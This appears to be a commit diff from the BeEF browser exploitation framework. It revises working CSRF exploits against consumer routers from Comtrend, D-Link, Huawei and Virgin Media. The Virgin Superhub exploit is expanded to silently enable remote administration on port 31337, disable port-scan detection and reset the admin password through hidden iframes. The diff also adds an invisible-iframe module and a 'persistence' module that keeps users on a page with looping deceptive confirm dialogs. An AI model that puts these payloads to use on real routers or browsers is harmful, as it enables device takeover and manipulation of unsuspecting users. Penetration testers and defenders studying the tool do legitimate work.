'port' : zombie_array[index]["port"]
'id' : index,
'ip' : ip,
'session' : session,
'text' : text,
'balloon_text' : balloon_text,
'check' : false,
'domain' : domain,
'port' : port
};
return new_zombie;

4
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -196,7 +196,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
var exists = this.getNodeById(hb_id);
if(exists) return;
hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port;
hooked_browser.qtip = hooked_browser.balloon_text;
//save a new online HB
if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
@@ -220,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new node for that hooked browser
node = new Ext.tree.TreeNode(hooked_browser);
//creates a sub-branch for that HB if necessary
mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);

30
extensions/console/lib/shellinterface.rb
View File

@@ -358,6 +358,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
hw_name = BD.get(self.targetsession, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -535,6 +550,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasPhonegap
has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?

2
modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
View File

@@ -24,7 +24,7 @@ beef:
target:
working:
S:
os: ["iPhone"]
os: ["iOS"]
not_working:
ALL:
os: ["All"]

4
modules/exploits/router/comtrend_ct5367_csrf/command.js
View File

@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "/password.cgi");
form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;

2
modules/exploits/router/comtrend_ct5624_csrf/command.js
View File

@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);

2
modules/exploits/router/dlink_dsl500t_csrf/command.js
View File

@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},

2
modules/exploits/router/huawei_smartax_mt880/command.js
View File

@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

18
modules/exploits/router/virgin_superhub_csrf/command.js
View File

@@ -17,17 +17,29 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
]);
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(virgin_superhub_iframe);
document.body.removeChild(virgin_superhub_iframe1);
document.body.removeChild(virgin_superhub_iframe2);
document.body.removeChild(virgin_superhub_iframe3);
}
setTimeout("cleanup()", 15000);

4
modules/exploits/router/virgin_superhub_csrf/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: ["Exploits", "Router"]
name: "Virgin Superhub CSRF"
description: "Attempts to change the admin password on a Virgin Superhub router."
authors: ["bcoles"]
description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
authors: ["bcoles", "n0x00"]
target:
working: ["ALL"]

5
modules/exploits/router/virgin_superhub_csrf/module.rb
View File

@@ -17,8 +17,9 @@ class Virgin_superhub_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
]
end

2
modules/host/detect_google_desktop/config.yaml
View File

@@ -24,5 +24,5 @@ beef:
target:
not_working:
ALL:
os: ["iPhone"]
os: ["iOS"]
working: ["ALL"]

2
modules/host/get_system_info/config.yaml
View File

@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
os: ["iOS", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]

2
modules/host/hook_default_browser/config.yaml
View File

@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
os: ["iPhone"]
os: ["iOS"]
working: ["All"]
user_notify: ["FF", "C"]

2
modules/host/iphone_tel/config.yaml
View File

@@ -24,7 +24,7 @@ beef:
target:
user_notify:
S:
os: ["iPhone"]
os: ["iOS"]
not_working:
ALL:
os: ["All"]

24
modules/misc/invisible_iframe/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var target = "<%= @target %>";
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
iframe_<%= @command_id %>.setAttribute('src', target);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=IFrame created');
});

25
modules/misc/invisible_iframe/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
invisible_iframe:
enable: true
category: "Misc"
name: "Create Invisible Iframe"
description: "Creates an invisible iframe."
authors: ["bcoles"]
target:
working: ["ALL"]

28
modules/misc/invisible_iframe/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Invisible_iframe < BeEF::Core::Command
def self.options
return [
{'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

4
modules/misc/local_file_theft/config.yaml
View File

@@ -23,7 +23,7 @@ beef:
enable: true
category: "Misc"
name: "Local File Theft"
description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.<br/>This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system."
authors: ["mh"]
target:
working: ["All"]
working: ["S"]

45
modules/persistence/confirm_close_tab/command.js Normal file
View File

@@ -0,0 +1,45 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
function display_confirm(){
if(confirm("Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.")){
display_confirm();
}
}
function dontleave(e){
e = e || window.event;
if(beef.browser.isIE()){
e.cancelBubble = true;
e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
}else{
if (e.stopPropagation) {
e.stopPropagation();
e.preventDefault();
}
}
//re-display the confirm dialog if the user clicks OK (to leave the page)
display_confirm();
return "There is currently a request to the server pending. You will lose recent changes by navigating away.";
}
window.onbeforeunload = dontleave;
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Module executed successfully');
});

26
modules/persistence/confirm_close_tab/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
confirm_close_tab:
enable: true
category: "Persistence"
name: "Confirm Close Tab"
description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
authors: ["antisnatchor"]
target:
user_notify: ["ALL"]
not_working: ["O"]

22
modules/persistence/confirm_close_tab/module.rb Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Confirm_close_tab < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
end
end